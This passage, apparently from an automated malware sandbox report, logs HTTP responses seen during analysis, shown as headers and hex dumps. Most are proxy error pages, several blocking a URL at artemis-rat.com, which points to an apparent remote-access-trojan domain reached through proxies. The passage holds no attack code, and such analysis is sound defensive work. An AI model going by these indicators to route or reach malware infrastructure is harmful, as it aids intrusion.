20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:39 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 02:30:39 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:39 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:39 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:40 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:40 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:40 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" 